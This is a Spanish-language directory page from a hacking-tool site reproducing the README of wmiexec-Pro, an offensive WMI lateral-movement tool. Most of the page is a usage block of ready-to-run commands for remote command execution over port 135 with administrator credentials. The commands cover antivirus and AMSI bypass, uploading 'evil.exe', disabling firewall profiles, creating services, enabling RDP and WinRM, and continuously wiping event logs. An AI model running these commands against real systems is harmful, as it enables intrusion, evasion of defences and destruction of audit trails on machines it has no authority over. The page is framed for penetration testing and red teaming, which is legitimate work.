Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
wmiexec-Pro — Nueva generación de wmiexec.py | Kitploit
Herramientas/GitHubGitHub/xiaolichan/wmiexec-pro
Escalada de PrivilegiosMecanismos de PersistenciaMovimiento LateralRecopilación de InformaciónPost-ExplotaciónPruebas de PenetraciónRed TeamingHerramienta de Acceso Remoto
GitHubxiaolichan/wmiexec-pro

wmiexec-Pro

Nueva generación de wmiexec.py

Ver Repositorio
1.3k15119hace 6 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

wmiexec-Pro

Tabla de contenido

  1. Información
  2. Agradecimientos especiales
  3. Características
  4. Cómo empezar
    • Instalación
  5. Uso
  6. Capturas de pantalla
  7. ¿Cómo funciona?
  8. Aviso legal
  9. Referencias

Información

La nueva generación de wmiexec.py, con más funciones nuevas; todas las operaciones solo funcionan con el puerto 135 (no se necesita conexión SMB) para la evasión de AV en el movimiento lateral (Windows Defender, HuoRong, 360)

(volver arriba)

Agradecimientos especiales

@422926799

(volver arriba)

Características

  • Característica principal: Evasión de AV
  • Característica principal: No se necesita win32_process
  • Característica principal: Solo se necesita el puerto 135.
  • Nuevo módulo: Bypass de AMSI
  • Nuevo módulo: Transferencia de archivos
  • Nuevo módulo: Habilitar RDP de forma remota mediante el método de clase WMI
  • Nuevo módulo: Abuso del firewall de Windows
  • Nuevo módulo: Limpieza en bucle del registro de eventos
  • Nuevo módulo: Habilitar WinRM de forma remota sin tocar CMD
  • Nuevo módulo: Administrador de servicios
  • Nuevo módulo: RID-Hijack
  • Mejora: Obtener la salida de la ejecución de comandos de una nueva forma
  • Mejora: Ejecutar archivos vbs

(volver arriba)

Cómo empezar

Instalación

Solo se necesita la última versión de Impacket

  1. Clona el repositorio de Impacket
    git clone https://github.com/fortra/impacket
    
  2. Instala Impacket
    cd impacket && sudo pip3 install .
    
  3. Disfrútalo :)
    git clone https://github.com/XiaoliChan/wmiexec-Pro
    

(volver arriba)

Uso

python3 wmiexec-pro.py [[domain/]username[:password]@]<targetName or address> module -h

Basic enumeration:
   python3 wmiexec-pro.py administrator:[email protected] enum -run

Enable/disable amsi bypass:
   python3 wmiexec-pro.py administrator:[email protected] amsi -enable
   python3 wmiexec-pro.py administrator:[email protected] amsi -disable

Execute command:
   python3 wmiexec-pro.py administrator:[email protected] exec-command -shell (Launch a semi-interactive shell)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" (Default is with output mode)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -silent (Silent mode)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -silent -old (Slient mode in old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -old (With output in old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -save (With output and save output to file)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -old -save
   python3 wmiexec-pro.py administrator:[email protected] exec-command -clear (Remove temporary class for command result storage)
   
Filetransfer:
   python3 wmiexec-pro.py administrator:[email protected] filetransfer -upload -src-file "./evil.exe" -dest-file "C:\windows\temp\evil.exe" (Upload file over 512KB)
   python3 wmiexec-pro.py administrator:[email protected] filetransfer -download -src-file "C:\windows\temp\evil.exe" -dest-file "/tmp/evil.exe" (Download file over 512KB)
   python3 wmiexec-pro.py administrator:[email protected] filetransfer -clear (Remove temporary class for file transfer)
   
RDP:
   python3 wmiexec-pro.py administrator:[email protected] rdp -enable (Auto configure firewall)
   python3 wmiexec-pro.py administrator:[email protected] rdp -enable -old (For old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:[email protected] rdp -enable-ram (Enable Restricted Admin Mode for PTH, not support old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:[email protected] rdp -disable
   python3 wmiexec-pro.py administrator:[email protected] rdp -disable -old (For old version OS, such as server 2003, not support old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:[email protected] rdp -disable-ram (Disable Restricted Admin Mode)

WinRM (Only support win7+):
   python3 wmiexec-pro.py administrator:[email protected] winrm -enable
   python3 wmiexec-pro.py administrator:[email protected] winrm -disable

Firewall (Only support win8+):
   python3 wmiexec-pro.py administrator:[email protected] firewall -search-port 445
   python3 wmiexec-pro.py administrator:[email protected] firewall -dump (Dump all firewall rules)
   python3 wmiexec-pro.py administrator:[email protected] firewall -rule-id (ID from search port) -action [enable/disable/remove] (enable, disable, remove specify rule)
   python3 wmiexec-pro.py administrator:[email protected] firewall -firewall-profile enable (Enable all firewall profiles)
   python3 wmiexec-pro.py administrator:[email protected] firewall -firewall-profile disable (Disable all firewall profiles)
   
Services:
   python3 wmiexec-pro.py administrator:[email protected] service -action create -service-name "test" -display-name "For test" -bin-path 'C:\windows\system32\calc.exe'
   python3 wmiexec-pro.py administrator:[email protected] service -action create -service-name "test" -display-name "For test" -bin-path 'C:\windows\system32\calc.exe' -class "Win32_TerminalService" (Create service via alternative class)
   python3 wmiexec-pro.py administrator:[email protected] service -action start -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -action stop -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -action disable -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -action auto-start -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -action manual-start -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -action getinfo -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -action delete -service-name "test"
   python3 wmiexec-pro.py administrator:[email protected] service -dump all-services.json

Eventlog:
   python3 wmiexec-pro.py administrator:[email protected] eventlog -risk-i-know (Looping cleaning eventlog)
   python3 wmiexec-pro.py administrator:[email protected] eventlog -retrive object-ID (Stop looping cleaning eventlog)
Descargar herramienta